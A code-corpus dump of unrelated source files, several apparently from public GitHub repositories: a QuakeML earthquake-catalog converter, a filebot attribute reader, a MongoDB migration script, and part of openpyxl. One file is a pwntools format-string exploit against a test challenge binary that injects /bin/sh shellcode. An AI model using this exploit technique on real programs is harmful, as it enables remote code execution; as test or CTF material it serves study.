if response.find('no channels found to match') > -1:
preferred = station
lines = []
else:
lines = []
nscl_list = []
for line in lines:
parts = line.split(':')
if len(parts) < 2:
continue
net,sta,loc,channel = parts[0].split()
if sta.lower() != station.lower():
continue
if channel[0:2] not in okchannels:
continue
if phasetype.lower().startswith('p') and not channel.lower().endswith('z'):
continue
if phasetype.lower().startswith('s') and re.search('[1|2|E|N]$',channel) is None:
continue
nscl = '%s.%s.%s.%s' % (net,sta,channel,loc)
nscl_list.append(nscl)
for nscl in nscl_list:
net,sta,channel,loc = nscl.split('.')
if channel.lower().startswith('hh'):
preferred = nscl
break
if channel.lower().startswith('bh'):
preferred = nscl
break
if channel.lower().startswith('sh'):
preferred = nscl
break
if channel.lower().startswith('hn'):
preferred = nscl
break
if preferred == station:
preferred = self.getFSDN(station)
if preferred == station:
preferred = self.getIR(station)
self.stationdict[stationkey] = preferred
return preferred
def getPrefMag(event):
url = URLBASE.replace('[RAD]','%i' % RADIUS)
url = url.replace('[LAT]','%.4f' % event['lat'])
url = url.replace('[LON]','%.4f' % event['lon'])
stime = event['time'] - timedelta(seconds=TIMEDELTA)
etime = event['time'] + timedelta(seconds=TIMEDELTA)
url = url.replace('[START]','%s' % stime.strftime(TIMEFMT))
url = url.replace('[END]','%s' % etime.strftime(TIMEFMT))
try:
fh = urllib2.urlopen(url)
except:
pass
data = fh.read()
fh.close()
jdict = json.loads(data)
if not jdict.has_key('features') or len(jdict['features']) > 1 or len(jdict['features']) == 0:
#raise Exception,'No or multiple events found for %s M%.1f' % (event['time'],event['magnitude'])
print 'No event matching %s M%.1f' % (event['time'],event['magnitude'][0]['magnitude'])
return None
try:
pevent = jdict['features'][0]
except:
pass
etime = datetime.utcfromtimestamp(pevent['properties']['time']/1000)
elon,elat,edep = pevent['geometry']['coordinates']
emag = pevent['properties']['mag']
prefmag = emag
return prefmag
def readLayerLine(event,line):
depth,vp,vs = [float(p) for p in line[1:].strip().split()]
if event.has_key('layer'):
event['layer'].append([depth,vp,vs])
else:
event['layer'] = [[depth,vp,vs]]
return event
def readStationLine(event,line):
parts = line[1:].strip().split()
station = parts[0]
lat,lon,elev = [float(p) for p in parts[1:4]]
if event.has_key('stations'):
event['stations'].append({'id':station,'lat':lat,'lon':lon,'elev':elev})
else:
event['stations'] = [{'id':station,'lat':lat,'lon':lon,'elev':elev}]
return event
def readCommentLine(event,line):
com = line[1:].strip()
if event.has_key('comment'):
event['comment'] += ' '+com
else:
event['comment'] = ' '+com
return event
def readHypoLine(event,line):
parts = line[1:].strip().split()
year = int(parts[0])
month = int(parts[1])
day = int(parts[2])
hour = int(parts[3])
minute = int(parts[4])
second = float(parts[5])
event['timeerror'] = float(parts[6])
microsecond = int((second - int(second))*1e6)
second = int(second) - 1
if second == -1:
second = 0
event['time'] = datetime(year,month,day,hour,minute,second,microsecond)
event['lat'] = float(parts[7])
lon = float(parts[8])
if lon > 180:
lon -= 360
event['lon'] = lon
event['azimuth'] = int(parts[9])
event['smajor'] = float(parts[10])
event['sminor'] = float(parts[11])
event['depth'] = float(parts[12])
event['depthcode'] = parts[13]
event['depthlower'] = float(parts[14])
event['depthupper'] = float(parts[15])
event['gtcu'] = parts[16]
event['author'] = parts[17]
event['clusterid'] = parts[18]
return event
def readMagnitudeLine(event,line):
parts = line[1:].split()
mag = {}
mag['magnitude'] = float(parts[0])
magtype = parts[1]
if magtype == 'UNK':
magtype = 'ML'
mag['magscale'] = magtype
mag['magauthor'] = ' '.join(parts[2:])
if event.has_key('magnitude'):
event['magnitude'].append(mag)
else:
event['magnitude'] = [mag]
return event
def readPhaseLine(event,line,st):
#refactoring the phase list into a phase dictionary, to handle duplicate instances of station-phase pairs.
#We wants the *second* instance of these, which requires that I keep a dictionary of phases instead of a
#list. Grr.
parts = line[1:].split()
phase = {}
phase['id'] = datetime.utcnow() #this will be used to link together picks and arrivals
try:
phase['usage'] = USAGE[parts[0]]
except:
pass
station = parts[1]
phase['name'] = parts[4]
phase['distance'] = float(parts[2])
phase['azimuth'] = int(parts[3])
year = int(parts[5])
month = int(parts[6])
day = int(parts[7])
hour = int(parts[8])
minute = int(parts[9])
second = float(parts[10])
microsecond = int((second - int(second))*1e6)
second = int(second) - 1 #assumption here is that input seconds are 1 to 60
if second == -1: #sometimes seconds are 0 to 59, sometimes 1 to 60. Not my problem.
second = 0
phase['time'] = datetime(year,month,day,hour,minute,second,microsecond)
nscl_station = st.getNSCL(station,phase['name'],phase['time'])
phase['sta'] = nscl_station
if nscl_station == station:
#print 'Could not find an NSCL name for %s. Skipping.' % station
print line.strip()
return event
phase['precision'] = int(parts[11])
phase['residual'] = float(parts[12])
phase['error'] = float(parts[13])
phasekey = phase['sta']+'_'+phase['name']
#if we have the phase already in the file, we'll replace it, which is easy.
if event.has_key('phases'):
event['phases'][phasekey] = phase.copy()
else:
event['phases'] = {phasekey:phase.copy()}
return event
def createMagTag(event):
prefmag = None
for mag in event['magnitude']:
if mag['magscale'].lower() == 'mw':
prefmag = mag.copy()
prefmag['magscale'] = 'Mw'
break
if mag['magscale'].lower() == 'mb':
prefmag = mag.copy()
break
if mag['magscale'].lower() == 'ml':
prefmag = mag.copy()
break
if mag['magscale'].lower() == 'mn':
prefmag = mag.copy()
break
if mag['magscale'].lower() == 'md':
prefmag = mag.copy()
break
if prefmag is None:
raise Exception("No preferred magnitude scale for event %s" % event['id'])
magtype = prefmag['magscale']
magid = 'us_%s_%s' % (event['id'],magtype)
magsource = prefmag['magauthor']
#create the magnitude tag
pubid = 'quakeml:us.anss.org/magnitude/%s/%s' % (event['id'],magtype)
magnitudetag = Tag('magnitude',attributes = {'catalog:dataid':magid,
'catalog:datasource':magsource,
'publicID':pubid})
#create all the pieces of the magnitude tag
magvaluetag = Tag('value',data='%.1f' % prefmag['magnitude'])
magtag = Tag('mag')
magtag.addChild(magvaluetag)
magtypetag = Tag('type',data=magtype)
magcreationtag = Tag('creationInfo')
magauthortag = Tag('author',data=prefmag['magauthor'])
magcreationtag.addChild(magauthortag)
#add the pieces to the magnitude tag
magnitudetag.addChild(magtag)
magnitudetag.addChild(magtypetag)
magnitudetag.addChild(magcreationtag)
return (magnitudetag,prefmag['magnitude'],pubid)
def createOriginTag(event,studyname):
eventcode = event['id']
catalog = SOURCE+studyname
originid = 'quakeml:us.anss.org/origin/%s' % ('%s%s' % (catalog,event['id']))
origintag = Tag('origin',attributes={'catalog:dataid':'%s%s' % (catalog,event['id']),
'catalog:datasource':SOURCE,
'catalog:eventid':'%s' % event['id'],
'catalog:eventsource':catalog,
'publicID':originid})
#confidence ellipse
uncertaintag = Tag('originUncertainty')
atag = Tag('maxHorizontalUncertainty',data='%.2f' % (event['smajor']*1000))
btag = Tag('minHorizontalUncertainty',data='%.2f' % (event['sminor']*1000))
aztag = Tag('azimuthMaxHorizontalUncertainty',data='%.2f' % (event['azimuth']))
uncertaintag.addChild(atag)
uncertaintag.addChild(btag)
uncertaintag.addChild(aztag)
#time
timetag = Tag('time')
tvaluetag = Tag('value',data = event['time'].strftime(TIMEFMT))
terrortag = Tag('uncertainty',data = '%.2f' % (event['timeerror']))
timetag.addChild(tvaluetag)
timetag.addChild(terrortag)
#lat
lattag = Tag('latitude')
latvaluetag = Tag('value',data='%.4f' % (event['lat']))
lattag.addChild(latvaluetag)
#lon
lontag = Tag('longitude')
lonvaluetag = Tag('value',data='%.4f' % (event['lon']))
lontag.addChild(lonvaluetag)
#depth
depthtag = Tag('depth')
depthvaluetag = Tag('value',data='%i' % (int(event['depth']*1000)))
depthlowertag = Tag('lowerUncertainty',data='%i' % (int(event['depthlower']*1000)))
depthuppertag = Tag('upperUncertainty',data='%i' % (int(event['depthupper']*1000)))
depthtypetag = Tag('depthType',data=DEPTHTYPES[event['depthcode']])
depthtag.addChild(depthvaluetag)
depthtag.addChild(depthlowertag)
depthtag.addChild(depthuppertag)
depthtag.addChild(depthtypetag)
#quality
stationlist = []
nphases = 0
azlist = []
rmslist = []
mindist = 999999999999
for phasekey,phase in event['phases'].iteritems():
if not phase['usage']:
continue
nphases += 1
if phase['sta'] not in stationlist:
stationlist.append(phase['sta'])
rmslist.append(phase['residual'])
if phase['distance'] < mindist:
mindist = phase['distance']
azlist.append(phase['azimuth'])
azlist = sorted(azlist)
resmean = sum(rmslist)/len(rmslist)
sumsquares = sum([math.pow(xi - resmean,2) for xi in rmslist])
stderr = math.sqrt(sumsquares/len(rmslist))
gap = azlist[0] + 360.0 - azlist[-1]
for i in range(1,len(azlist)):
dt = azlist[i] - azlist[i-1]
if dt > gap:
gap = dt
nstations = len(stationlist)
qualitytag = Tag('quality')
phasecounttag = Tag('usedPhaseCount',data = '%i' % nphases)
stationcounttag = Tag('usedStationCount',data = '%i' % nstations)
stderrtag = Tag('standardError',data = '%.2f' % stderr)
gaptag = Tag('azimuthalGap',data = '%i' % int(gap))
disttag = Tag('minimumDistance',data = '%.2f' % mindist)
qualitytag.addChild(phasecounttag)
qualitytag.addChild(stationcounttag)
qualitytag.addChild(stderrtag)
qualitytag.addChild(gaptag)
qualitytag.addChild(disttag)
#evaluation status and mode
evaltag = Tag('evaluationStatus',data='reviewed')
modetag = Tag('evaluationMode', data='manual')
#creation info
origincreationtag = Tag('creationInfo')
originauthortag = Tag('author',data=event['author'])
origincreationtag.addChild(originauthortag)
#roll up the origin tag
origintag.addChild(uncertaintag)
origintag.addChild(timetag)
origintag.addChild(lattag)
origintag.addChild(lontag)
origintag.addChild(depthtag)
origintag.addChild(qualitytag)
origintag.addChild(evaltag)
origintag.addChild(modetag)
origintag.addChild(origincreationtag)
return (origintag,originid)
def createArrivalTag(phase,eventid):
picktime = phase['id'].strftime('%s')+'.'+phase['id'].strftime('%f')
arrid = 'quakeml:us.anss.org/arrival/%s/us_%s' % (eventid,picktime)
arrivaltag = Tag('arrival',attributes={'publicID':arrid})
pickid = 'quakeml:us.anss.org/pick/%s/us_%s' % (eventid,picktime)
pickidtag = Tag('pickID',data=pickid)
phasetag = Tag('phase',data=phase['name'])
azimuthtag = Tag('azimuth',data='%.2f' % (phase['azimuth']))
distancetag = Tag('distance',data='%.2f' % (phase['distance']))
residualtag = Tag('timeResidual',data='%.2f' % (phase['residual']))
weighttag = Tag('timeWeight',data='%.2f' % (phase['error']))
arrivaltag.addChild(pickidtag)
arrivaltag.addChild(phasetag)
arrivaltag.addChild(azimuthtag)
arrivaltag.addChild(distancetag)
arrivaltag.addChild(residualtag)
arrivaltag.addChild(weighttag)
return arrivaltag
def createPickTag(phase,eventid):
picktime = phase['id'].strftime('%s')+'.'+phase['id'].strftime('%f')
pickid = 'quakeml:us.anss.org/pick/%s/us_%s' % (eventid,picktime)
picktag = Tag('pick',attributes={'publicID':pickid})
timetag = Tag('time')
timevaluetag = Tag('value',data=phase['time'].strftime(TIMEFMT+'Z'))
timetag.addChild(timevaluetag)
network,station,channel,location = phase['sta'].split('.')
attributes = {}
if network.replace('-','').strip() != '':
attributes['networkCode'] = network
if station.replace('-','').strip() != '':
attributes['stationCode'] = station
if channel.replace('-','').strip() != '':
attributes['channelCode'] = channel
if location.replace('-','').strip() != '':
attributes['locationCode'] = location
wavetag = Tag('waveformID',attributes=attributes)
hinttag = Tag('phaseHint',data=phase['name']) #duplicate of arrival->phase (??)
evaltag = Tag('evaluationMode',data='manual')
picktag.addChild(timetag)
picktag.addChild(wavetag)
picktag.addChild(hinttag)
picktag.addChild(evaltag)
return picktag
def createEventTag(event,studyname):
quaketag = Tag('q:quakeml',attributes={'xmlns:q':'http://quakeml.org/xmlns/quakeml/1.2',
'xmlns':'http://quakeml.org/xmlns/bed/1.2',
'xmlns:catalog':'http://anss.org/xmlns/catalog/0.1',
'xmlns:tensor':'http://anss.org/xmlns/tensor/0.1'})
pubid = 'quakeml:us.anss.org/eventparameters/%s/%i' % (event['id'],int(datetime.utcnow().strftime('%s')))
creationinfotag = Tag('creationInfo')
agencyidtag = Tag('agencyID',data='us')
creationtimetag = Tag('creationTime',data=datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')+'Z')
creationinfotag.addChild(agencyidtag)
creationinfotag.addChild(creationtimetag)
paramtag = Tag('eventParameters',attributes={'xmlns':'http://quakeml.org/xmlns/bed/1.2',
'publicID':pubid})
paramtag.addChild(creationinfotag)
catalog = SOURCE+studyname
eventtag = Tag('event',attributes={'catalog:dataid':'%s%s' % (catalog,event['id']),
'catalog:datasource':SOURCE,
'catalog:eventid':'%s' % event['id'],
'catalog:eventsource':catalog})
# commenttag = Tag('comment')
# texttag = Tag('text',data=comment)
# commenttag.addChild(texttag)
# eventtag.addChild(commenttag)
if event.has_key('magnitude'):
magtag,prefmag,pubmagid = createMagTag(event)
hypotag,originid = createOriginTag(event,studyname)
preferredtag = Tag('preferredOriginID',data=originid)
prefmagtag = Tag('preferredMagnitudeID',data=pubmagid)
eventtag.addChild(preferredtag)
eventtag.addChild(prefmagtag)
for phasekey,phase in event['phases'].iteritems():
arrivaltag = createArrivalTag(phase,event['id'])
picktag = createPickTag(phase,event['id'])
eventtag.addChild(picktag)
hypotag.addChild(arrivaltag)
#roll up eventtag
if event.has_key('magnitude'):
eventtag.addChild(magtag)
eventtag.addChild(hypotag)
#roll up eventParams tag
paramtag.addChild(eventtag)
#roll up quakeml tag
quaketag.addChild(paramtag)
return (quaketag,prefmag)
def main(args):
qomfile = args.qomfile
outfolder = args.outfolder
if not os.path.isdir(outfolder):
os.makedirs(outfolder)
st = StationTranslator(dictionaryfile=args.dictionary)
f = open(qomfile,'rt')
events = []
event = {}
i = 1
comment = ''
nphases = 0
phaselist = []
for line in f.readlines():
if line.startswith('L'):
event = readLayerLine(event,line)
if line.startswith('C'):
event = readStationLine(event,line)
if line.startswith('#'):
comment += line.strip('#')
if line.startswith('E'):
event['id'] = '%08i' % i #ignore Eric's event ID fields
if line.startswith('H'):
event = readHypoLine(event,line)
if line.startswith('M'):
event = readMagnitudeLine(event,line)
if line.startswith('P'):
#sys.stderr.write('reading phase line %i ("%s")\n' % (nphases+1,line))
nphases += 1
event = readPhaseLine(event,line,st)
if line.startswith('STOP'):
events.append(event.copy())
sys.stderr.write('Parsed event %i\n' % i)
i += 1
sys.stderr.flush()
event = {}
f.close()
print 'Read %i events' % len(events)
#try to find the best magnitude from comcat for the larger events
for event in events:
if event['magnitude'][0]['magnitude'] > MINMAG:
prefmag = getPrefMag(event)
if prefmag is not None:
print 'For event %s, switching magnitude M%.1f to M%.1f' % (event['time'],event['magnitude'][0]['magnitude'],prefmag)
event['magnitude'][0]['magnitude'] = prefmag
dictfile = 'stationcodes.dat'
print 'Saving dictionary of station codes to %s' % dictfile
st.save(dictfile)
#filter out non-ascii characters
#comment = filter(lambda x: x in string.printable, comment)
tmin = datetime(2500,1,1)
tmax = datetime(1900,1,1)
latmin = 95.0
latmax = -95.0
lonmin = 190000.0
lonmax = -190000.0
magmin = 10.1
magmax = -0.1
for event in events:
etag,prefmag = createEventTag(event,args.studyname)
if event['time'] < tmin:
tmin = event['time']
if event['time'] > tmax:
tmax = event['time']
if event['lat'] < latmin:
latmin = event['lat']
if event['lat'] > latmax:
latmax = event['lat']
if event['lon'] < lonmin:
lonmin = event['lon']
if event['lon'] > lonmax:
lonmax = event['lon']
if prefmag < magmin:
magmin = prefmag
if prefmag > magmax:
magmax = prefmag
fname = os.path.join(outfolder,SOURCE+event['id']+'.xml')
#etag.renderToXML(fname)
xmlstr = etag.renderTag(0)
xmlstr = xmlstr.replace('\t','')
xmlstr = xmlstr.replace('\n','')
f = open(fname,'wt')
f.write(xmlstr)
f.close()
# studyname = args.studyname
# authors = args.authors.split(',')
# desc = args.description
# email = args.contactemail
# name = args.contactname
if args.pubid:
pubid = args.pubid
# print
# print 'Catalog Name: %s' % args.studyname
# print 'Catalog Authors: %s' % ', '.join(args.authors.split(','))
# print 'Point of Contact: %s, %s' % (args.contactname,args.contactemail)
# print 'Short Description: %s' % (args.description)
# print 'Time Span: %s to %s' % (tmin.strftime(TIMEFMT),tmax.strftime(TIMEFMT))
# print 'Spatial Domain: Latitude %.4f to %.4f, Longitude %.4f to %.4f' % (latmin,latmax,lonmin,lonmax)
# print 'Magnitude Range: %.1f to %.1f' % (magmin,magmax)
# print 'Detailed Description:\n%s' % textwrap.fill(comment,80)
if __name__ == '__main__':
desc = "Create QuakeML files and metadata output for an input RDE relocation cluster file"
parser = argparse.ArgumentParser(description=desc,formatter_class=argparse.RawDescriptionHelpFormatter)
#positional arguments
parser.add_argument('qomfile',
help='Input study data file')
parser.add_argument('outfolder',
help='Output folder where QuakeML files will be written')
parser.add_argument('studyname',
help='Short name of study (mineral2011) - will be prepended with rde and used as ComCat catalog name.')
# parser.add_argument('authors',
# help='Comma separated list of authors (surround with quotes).')
# parser.add_argument('description',
# help='One-line description of study.')
# parser.add_argument('contactemail',
# help='Email of main point of contact.')
# parser.add_argument('contactname',
# help='Name of main point of contact.')
parser.add_argument('-p','--pubid', dest='pubid',
help='(Optional) doi number.')
parser.add_argument('-d','--dictionary', dest='dictionary',
help='(Optional) File containing dictionary of station->NSCL codes.')
pargs = parser.parse_args()
main(pargs)
| [
"mhearne@usgs.gov"
] | mhearne@usgs.gov |
eae8abe134495da20b517f2e9472c36992a1ea5d | 91ff566b975b7c0a21d280aa192953622600afae | /deploy_flask/lib/python3.6/ntpath.py | 1e45631713ffa8a4537cc00e40f64056c55af8f6 | [] | no_license | mattg317/Deploying_with_Flask | 93e1f19f093e02b886f02e01c30075fbbbafb6e1 | 881e694f74bd2f170ed8f638ffb97811d19e3969 | refs/heads/master | 2021-09-04T12:50:36.147008 | 2018-01-18T21:41:18 | 2018-01-18T21:41:18 | 107,602,674 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 58 | py | /Users/matthewgiordanella/anaconda/lib/python3.6/ntpath.py | [
"mattg317@gmail.com"
] | mattg317@gmail.com |
5cb5b444d884d749465d4e777e33c10b94b3b810 | 10857edc2c10a89077555595b253376dbdcd17cb | /main.py | a6684596c2dc869d436e1a05c48af4f0243a50d3 | [
"MIT"
] | permissive | pannal/libfilebot | dfe0a55e804b9118fc643057ac010432c903ac10 | 996736ec0139aeae95f44e7fdb0a748fe08214c5 | refs/heads/master | 2021-09-02T01:27:48.203475 | 2017-12-29T16:58:30 | 2017-12-29T16:58:30 | 115,065,680 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,648 | py | # coding=utf-8
import subprocess
import sys
import traceback
import logging
import re
import binascii
import types
from pipes import quote
from lib import find_executable
if sys.platform == "win32":
from pyads import ADS
logger = logging.getLogger(__name__)
def quote_args(seq):
return ' '.join(quote(arg) for arg in seq)
def win32_xattr(fn):
handler = ADS(fn)
return handler.get_stream_content("net.filebot.filename")
def default_xattr(fn):
if not default_xattr_bin:
raise Exception("Neither getfattr, attr nor filebot were found")
if "getfattr" in default_xattr_bin:
return ["getfattr", "-n", "user.net.filebot.filename", fn]
elif "attr" in default_xattr_bin:
return ["attr", "-g", "net.filebot.filename", fn]
return ["filebot", "-script", "fn:xattr", fn]
XATTR_MAP = {
"default": (
default_xattr,
lambda result: re.search('(?um)(net\.filebot\.filename(?=="|: )[=:" ]+|Attribute.+:\s)([^"\n\r\0]+)',
result).group(2)
),
"darwin": {
lambda fn: ["xattr", "-p", "net.filebot.filename", fn],
lambda result: binascii.unhexlify(result.replace(' ', '').replace('\n', '')).strip("\x00")
},
"win32": {
lambda fn: fn,
win32_xattr,
}
}
if sys.platform not in XATTR_MAP:
default_xattr_bin = find_executable("getfattr") or find_executable("attr") or find_executable("filebot")
def get_filebot_attrs(fn):
"""
Currently only supports the filebot filename attrs
:param fn: filename
:return:
"""
if sys.platform in XATTR_MAP:
logger.debug("Using native xattr calls for %s", sys.platform)
else:
logger.debug("Using %s for %s", default_xattr_bin, sys.platform)
args_func, match_func = XATTR_MAP.get(sys.platform, XATTR_MAP["default"])
args = args_func(fn)
if isinstance(args, types.ListType):
try:
output = subprocess.check_output(quote_args(args), stderr=subprocess.PIPE, shell=True)
except subprocess.CalledProcessError, e:
if e.returncode == 1:
logger.info(u"%s: Couldn't get filebot original filename", fn)
else:
logger.error(u"%s: Unexpected error while getting filebot original filename: %s", fn,
traceback.format_exc())
return
else:
output = args
try:
orig_fn = match_func(output)
return orig_fn.strip()
except:
logger.info(u"%s: Couldn't get filebot original filename" % fn)
if __name__ == "__main__":
print get_filebot_attrs(sys.argv[1])
| [
"panni@fragstore.net"
] | panni@fragstore.net |
025002537b75adc263d8ca8ed6e3eb0b03adc44b | 077a17b286bdd6c427c325f196eb6e16b30c257e | /08_FmtString-unit-tests/13_32/remenissions-work/exploit-FsRetShellcode.py | e5a56cd137bb5b1dc25714972fc3c717b69d43f1 | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,084 | py | from pwn import *
import os
import sf
import sys
import signal
target = process("./chall-test_FmtString-13-x86")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=32)
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
ret_address = leak + (108)
fs = sf.WriteFmtStr(
arch = 32,
value = -0x46,
address = 0x0,
offset = 0x4,
printed_bytes = 0x0,
alignment_bytes = 0x0,
value_base = ret_address,
address_base = ret_address)
payload = sf.BufferOverflow(arch=32, start=108)
payload.add_bytes(108, fs.generate_fmt_str())
payload.add_bytes(70, b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80")
target.sendline(payload.generate_payload())
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
try:
while True:
target.recvall(timeout=2)
except Exception:
print("Exploit timed out")
| [
"ryancmeinke@gmail.com"
] | ryancmeinke@gmail.com |
072c86d1641e5db25afaccbb5f221e35910e72be | ea1703dbfedb3abced6dad5acf6f43b341e881ab | /Chapter 1/stringTripleQuotes.py | 51aa135c8109918af8dc6397df8ef1d6f2778a54 | [] | no_license | NathanZuidema/Learn-Python-for-Stats-and-Econ | 2019927cf536411a73049404a8cc15bc12ee7633 | cb589999f1275754e58994ef84c85ccc702707b5 | refs/heads/master | 2020-04-18T08:43:07.756614 | 2019-01-24T16:50:22 | 2019-01-24T16:50:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | #stringTripleQuotes.py
x = """ Everything in this object will be recorded exactly as entered,
if we enter a new line or
a new line with a tab."""
print(x) | [
"jlcatonjr@gmail.com"
] | jlcatonjr@gmail.com |
9e36b3b15685c1ec32b9a2db9b529d46cf6d65ca | b333dc607a2f1556f6a8adb6d16dc88fa8a30c8b | /portal/libs/scripts/one_time/20200814_migrate_visitorsmdb.py | 028a68923f56bb5d6dba9357067bc1e62e676452 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hernan0216/utopia-cms | 6558f8f600620c042dd79c7d2edf18fb77caebb8 | 48b48ef9acf8e3d0eb7d52601a122a01da82075c | refs/heads/main | 2023-02-06T10:31:35.525180 | 2020-12-15T17:43:28 | 2020-12-15T17:43:28 | 321,775,279 | 1 | 0 | BSD-3-Clause | 2020-12-15T19:59:17 | 2020-12-15T19:59:16 | null | UTF-8 | Python | false | false | 2,070 | py | # -*- coding: utf-8 -*-
# la diaria 2020. Aníbal Pacheco.
"""
1. set SIGNUPWALL_MONGODB_VISITOR to None in local_settings before running this script in a "live" environment.
2. touch uwsgi.ini.
3. run this script.
4. drop old table:
mongo
> use ldsocial_signupwall_visitor
> db.dropDatabase()
5. rename new table with the old table name and add indexes:
mongodump --archive="visitor_new" --db=ldsocial_signupwall_visitor_new
mongorestore --archive="visitor_new" --nsFrom='ldsocial_signupwall_visitor_new.*' --nsTo='ldsocial_signupwall_visitor.*'
mongo
> use ldsocial_signupwall_visitor_new
> db.dropDatabase()
> use ldsocial_signupwall_visitor
> db.posts.createIndex({'timestamp': -1})
> db.posts.createIndex({'session_key': -1})
> db.posts.createIndex({'ip_address': -1})
> db.posts.createIndex({'user': -1})
6. return the local setting to its original value.
7. deploy branch with the modifications to use the new table.
"""
from pymongo import MongoClient
from pymongo.errors import ServerSelectionTimeoutError
from progress.bar import Bar
try:
client = MongoClient(serverSelectionTimeoutMS=1000)
client.server_info()
signupwall_visitor_mdb = client['ldsocial_signupwall_visitor']
signupwall_visitor_mdb_new = client['ldsocial_signupwall_visitor_new']
except ServerSelectionTimeoutError:
signupwall_visitor_mdb = signupwall_visitor_mdb_new = None
if signupwall_visitor_mdb and signupwall_visitor_mdb_new:
visitors = signupwall_visitor_mdb.posts.find({'paths_visited': {'$exists': True}}, no_cursor_timeout=True)
bar = Bar('Processing ...', max=visitors.count())
for v in visitors:
paths_visited = v.get('paths_visited')
if paths_visited:
migrated = {'timestamp': v['last_update'], 'session_key': v['session_key'], 'ip_address': v['ip_address']}
user = v.get('user')
if user:
migrated.update({'user': user})
signupwall_visitor_mdb_new.posts.insert_many([dict(migrated, path_visited=p) for p in paths_visited])
bar.next()
bar.finish()
| [
"apacheco@ladiaria.com.uy"
] | apacheco@ladiaria.com.uy |
003d78fb2133693c22ca4a3d4ce5f95238c5d1a2 | 42b9bafc3c757543328d93fb60269ad4255aae17 | /env/lib/python3.7/site-packages/openpyxl/workbook/workbook.py | 7e5fc075a6deb1c6daf4828bc21ad37c35c01160 | [
"MIT"
] | permissive | mejeng/kasir | 4fe66d1828e72b64d770426d71185cdd3c54127e | cc6f9158b61c0cb45078ddf798af9588c8771311 | refs/heads/master | 2020-09-25T03:36:10.144439 | 2019-11-30T07:59:23 | 2019-11-30T07:59:23 | 225,908,795 | 2 | 0 | MIT | 2019-12-04T16:21:15 | 2019-12-04T16:21:15 | null | UTF-8 | Python | false | false | 13,206 | py | from __future__ import absolute_import
# Copyright (c) 2010-2019 openpyxl
"""Workbook is the top-level container for all document information."""
from copy import copy
from openpyxl.compat import deprecated, long
from openpyxl.worksheet.worksheet import Worksheet
from openpyxl.worksheet._read_only import ReadOnlyWorksheet
from openpyxl.worksheet._write_only import WriteOnlyWorksheet
from openpyxl.worksheet.copier import WorksheetCopy
from openpyxl.utils import quote_sheetname
from openpyxl.utils.indexed_list import IndexedList
from openpyxl.utils.datetime import CALENDAR_WINDOWS_1900
from openpyxl.utils.exceptions import ReadOnlyWorkbookException
from openpyxl.writer.excel import save_workbook
from openpyxl.styles.cell_style import StyleArray
from openpyxl.styles.named_styles import NamedStyle
from openpyxl.styles.differential import DifferentialStyleList
from openpyxl.styles.alignment import Alignment
from openpyxl.styles.borders import DEFAULT_BORDER
from openpyxl.styles.fills import DEFAULT_EMPTY_FILL, DEFAULT_GRAY_FILL
from openpyxl.styles.fonts import DEFAULT_FONT
from openpyxl.styles.protection import Protection
from openpyxl.styles.colors import COLOR_INDEX
from openpyxl.styles.named_styles import NamedStyleList
from openpyxl.styles.table import TableStyleList
from openpyxl.chartsheet import Chartsheet
from .defined_name import DefinedName, DefinedNameList
from openpyxl.packaging.core import DocumentProperties
from openpyxl.packaging.relationship import RelationshipList
from .child import _WorkbookChild
from .protection import DocumentSecurity
from .properties import CalcProperties
from .views import BookView
from openpyxl.xml.constants import (
XLSM,
XLSX,
XLTM,
XLTX
)
INTEGER_TYPES = (int, long)
class Workbook(object):
"""Workbook is the container for all other parts of the document."""
_read_only = False
_data_only = False
template = False
path = "/xl/workbook.xml"
def __init__(self,
write_only=False,
iso_dates=False,
):
self._sheets = []
self._pivots = []
self._active_sheet_index = 0
self.defined_names = DefinedNameList()
self._external_links = []
self.properties = DocumentProperties()
self.security = DocumentSecurity()
self.__write_only = write_only
self.shared_strings = IndexedList()
self._setup_styles()
self.loaded_theme = None
self.vba_archive = None
self.is_template = False
self.code_name = None
self.epoch = CALENDAR_WINDOWS_1900
self.encoding = "utf-8"
self.iso_dates = iso_dates
if not self.write_only:
self._sheets.append(Worksheet(self))
self.rels = RelationshipList()
self.calculation = CalcProperties()
self.views = [BookView()]
def _setup_styles(self):
"""Bootstrap styles"""
self._fonts = IndexedList()
self._fonts.add(DEFAULT_FONT)
self._alignments = IndexedList([Alignment()])
self._borders = IndexedList()
self._borders.add(DEFAULT_BORDER)
self._fills = IndexedList()
self._fills.add(DEFAULT_EMPTY_FILL)
self._fills.add(DEFAULT_GRAY_FILL)
self._number_formats = IndexedList()
self._date_formats = {}
self._protections = IndexedList([Protection()])
self._colors = COLOR_INDEX
self._cell_styles = IndexedList([StyleArray()])
self._named_styles = NamedStyleList()
self.add_named_style(NamedStyle(font=copy(DEFAULT_FONT), builtinId=0))
self._table_styles = TableStyleList()
self._differential_styles = DifferentialStyleList()
@property
def read_only(self):
return self._read_only
@property
def data_only(self):
return self._data_only
@property
def write_only(self):
return self.__write_only
@property
def guess_types(self):
return getattr(self, '__guess_types', False)
@guess_types.setter
def guess_types(self, value):
self.__guess_types = value
@deprecated("Use the .active property")
def get_active_sheet(self):
"""Returns the current active sheet."""
return self.active
@property
def excel_base_date(self):
return self.epoch
@property
def active(self):
"""Get the currently active sheet or None
:type: :class:`openpyxl.worksheet.worksheet.Worksheet`
"""
try:
return self._sheets[self._active_sheet_index]
except IndexError:
pass
@active.setter
def active(self, value):
"""Set the active sheet"""
if not isinstance(value, (_WorkbookChild, INTEGER_TYPES)):
raise TypeError("Value must be either a worksheet, chartsheet or numerical index")
